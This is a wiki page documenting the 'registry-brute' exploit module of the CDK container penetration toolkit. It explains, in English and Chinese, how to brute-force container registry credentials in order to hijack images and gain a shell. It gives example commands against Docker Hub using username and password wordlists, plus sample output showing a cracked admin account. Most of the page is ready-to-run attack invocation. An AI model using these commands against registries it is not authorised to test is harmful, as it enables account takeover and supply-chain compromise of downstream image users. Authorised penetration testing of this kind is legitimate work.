Skip to content

Exploit: Container Image Registry Brute

neargle edited this page Jun 27, 2021 · 1 revision

To container image registry, brute force the accounts and passwords cracking.

暴力破解容器镜像源的账号和密码,获取一个可用的账户,用于劫持镜像获取Shell。

Usage

./cdk registry-brute <registry-url> <username|file> <password|file>.

用户名和密码的参数,可以指定文件,单个用户名,单个密码和多个密码组合。

Example

例如:

./cdk registry-brute <registry-url> <username|file> <password|file>

./cdk registry-brute https://index.docker.io/ root,admin /tmp/passwordfile

./cdk registry-brute https://index.docker.io/ admin admin

./cdk registry-brute https://index.docker.io/ /tmp/usernamefile /tmp/passwordfile

Output:

➜  CDK git:(main) ✗ ./cdk run registry-brute http://docker.xxxxx admin /tmp/password-list
2021/06/27 11:57:20 user dict length: 1.
2021/06/27 11:57:20 password dict length: 108.
2021/06/27 11:57:23 Account: admin:xxxxxxx is available.
2021/06/27 11:57:23 End!
Clone this wiki locally